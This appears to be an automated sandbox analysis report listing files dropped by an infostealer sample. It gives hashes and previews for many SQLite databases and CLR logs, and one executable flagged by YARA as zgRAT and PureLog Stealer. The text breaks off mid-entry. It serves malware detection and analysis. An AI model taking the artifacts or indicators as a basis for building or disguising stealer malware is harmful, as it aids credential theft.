Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe.log

Download File

Process:	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	847
Entropy (8bit):	5.354334472896228
Encrypted:	false
SSDEEP:	24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
MD5:	9F9FA9EFE67E9BBD165432FA39813EEA
SHA1:	6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
SHA-256:	4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
SHA-512:	F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\System.exe.log

Download File

Process:	C:\ServerfontSessiondhcpcommon\System.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	847
Entropy (8bit):	5.354334472896228
Encrypted:	false
SSDEEP:	24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
MD5:	9F9FA9EFE67E9BBD165432FA39813EEA
SHA1:	6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
SHA-256:	4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
SHA-512:	F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\comReviewsvc.exe.log

Download File

Process:	C:\ServerfontSessiondhcpcommon\comReviewsvc.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1396
Entropy (8bit):	5.350961817021757
Encrypted:	false
SSDEEP:	24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNrJE4qtE4KlOU4mZsXE4Npv:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHKu
MD5:	EBB3E33FCCEC5303477CB59FA0916A28
SHA1:	BBF597668E3DB4721CA7B1E1FE3BA66E4D89CD89
SHA-256:	DF0C7154CD75ADDA09758C06F758D47F20921F0EB302310849175D3A7346561F
SHA-512:	663994B1F78D05972276CD30A28FE61B33902D71BF1DFE4A58EA8EEE753FBDE393213B5BA0C608B9064932F0360621AF4B4190976BE8C00824A6EA0D76334571
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr

C:\Users\user\AppData\Local\Temp\0e454a4aa7da286c68fc91d32fae06f16023c044

Download File

Process:	C:\ServerfontSessiondhcpcommon\comReviewsvc.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	280
Entropy (8bit):	5.7807379196087005
Encrypted:	false
SSDEEP:	6:dZhVcGJF72nHWtehpCnYTbfot8nyxBqe+T/6IDRf8S528dk:Tha0behQY/fwSTee6GUIZdk
MD5:	F6CB4C70AC1D40D3E5FB3EF5C2FD794D
SHA1:	CCF40F1AB5BBF394ACFAA06424076B31EA3BD4AB
SHA-256:	C8A3518FF116E87B465A8BCAB07C79C067C1C5B17543E54690D1CD321B23B56F
SHA-512:	3FECDE9A773DC3A58353300EE3028BFDB78DE1E9BE1D18B94396BCD963F1300CEE69F11ADE1C00082705557F5AB188AA457ACF822BD2471FD77418DEE57615DE
Malicious:	false
Preview:	H4sIAAAAAAAEAK2QQQvCMAyF/4p4UhDRi4g3EcYUhOEuQ+OhdNmsrk1tum766y2ePHjwIIEEHu97JDkNNyuAzFHthB4kqkEejPrlYgzQKVNSx5Y6dHzBpgHYU9lGRwSEvIka98LErtF4gPl0FmsOwOiCkshT7HE4eefnUUJXkfE5Misy5UVaSVqTAUjT6njltirDs0+suVcu87uioC3btl//mrK2tlFS+Cgn8RRMif2vbP5gj/rD/fUfVxHEv7aN84BBYcdBvpnzC4L5OcSJAQAA

C:\Users\user\AppData\Local\Temp\19092MRxSp

Download File

Process:	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1dk7lrpNw3

Download File

Process:	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\4AcUtSBVoT

Download File

Process:	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5712781801655107
Encrypted:	false
SSDEEP:	12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	05A60B4620923FD5D53B9204391452AF
SHA1:	DC12F90925033F25C70A720E01D5F8666D0B46E4
SHA-256:	6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
SHA-512:	068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\5QC4vmOVXb

Download File

Process:	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.137181696973627
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
MD5:	2D903A087A0C793BDB82F6426B1E8EFB
SHA1:	E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
SHA-256:	AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
SHA-512:	90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\8SRIhEkWAF

Download File

Process:	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\8mqq8UsJhK

Download File

Process:	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.137181696973627
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
MD5:	2D903A087A0C793BDB82F6426B1E8EFB
SHA1:	E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
SHA-256:	AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
SHA-512:	90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\DC.exe

Download File

Process:	C:\Users\user\Desktop\Dfim58cp4J.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2351929
Entropy (8bit):	7.509788869531614
Encrypted:	false
SSDEEP:	24576:2TbBv5rUyXVk80BXGwUcxqpsuNPJMYBhb0FmCVd3hAnp504X5zxzFBsLuQ/PRz42:IBJkbGwUj6YB+lJApdxRHk7t
MD5:	8E9E5B8DC57C1A495271A7C764BC9520
SHA1:	A82C37476EAB81073020D4E17B434235D9DF08B6
SHA-256:	D7D12CE9F4F6E749E4E5EF17815FCDD60C857C3532864956852C19EDF6B69514
SHA-512:	2D7F682C51492B39FC018852B2D257F47482D77283DBAF9A11EE9B976E05C9A089C490B79831B04B47519700FFC168289CBAFD06D37B5CE2C6D8B61EF4AE3B73
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Temp\DC.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\DC.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\DC.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\DC.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 83%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I.>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I.=>...I..=>..Rich<>..........PE..L..... b............................0........0....@..........................P............@.........................p...4.......P....@....................... ..<#......T............................U..@............0..x....... ....................text............................... ..`.rdata.......0....... ..............@..@.data... G..........................@....didat.......0......................@....rsrc........@......................@..@.reloc..<#... ...$..................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\KQCNn4oE3C

Download File

Process:	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Kq8opN8DIj

Download File

Process:	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\N321RUFHkm

Download File

Process:	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\NDYsEwBm1c

Download File

Process:	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\OaiiqF9qGH

Download File

Process:	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe
File Type:	SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5707520969659783
Encrypted:	false
SSDEEP:	12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	9F6D153D934BCC50E8BC57E7014B201A
SHA1:	50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
SHA-256:	2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
SHA-512:	B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
Malicious:	false
Preview:	SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\QlkcKPALDz

Download File

Process:	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.3909341910495931
Encrypted:	false
SSDEEP:	48:ToyFawNLopFgU10XJBjKwsBjAFMtt/qEM0g9gingQeroAsaC7cUXt9P:cyxe8OwsiFMttSzefroYC7J9P
MD5:	1EB30D95ED94CA01369986C3811A0591
SHA1:	D7277FF6C5D5F55A4B0576045C2928D7501E7AFC
SHA-256:	CA8D4F98E4AD0ED1F66819E90024EB527A7A46DC26D84FB9FF5F1829B6331F46
SHA-512:	D5C8BA028977ABA2416D2C02D50FD2535F646003D8F443A01E00C6FC9385F16A6C051502D3947CABF592C619E3E0A22EC586AD57876E517C7B5BB749D396ABA7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\UguVwxZYy6

Download File

Process:	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5712781801655107
Encrypted:	false
SSDEEP:	12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	05A60B4620923FD5D53B9204391452AF
SHA1:	DC12F90925033F25C70A720E01D5F8666D0B46E4
SHA-256:	6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
SHA-512:	068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\aofgzBPmys

Download File

Process:	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\cDYEqnNJED

Download File

Process:	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\h63mhrC5v5

Download File

Process:	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\hVYYqjut48

Download File

Process:	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 5
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.848598812124929
Encrypted:	false
SSDEEP:	24:TLVF1kwNbXYFpFNYcw+6UwcQVXH5fBODYfOg1ZAJFF0DiUhQ5de5SjhXE1:ThFawNLopFgU10XJBODqzqFF0DYde5P
MD5:	9664DAA86F8917816B588C715D97BE07
SHA1:	FAD9771763CD861ED8F3A57004C4B371422B7761
SHA-256:	8FED359D88F0588829BA60D236269B2528742F7F66DF3ACF22B32B8F883FE785
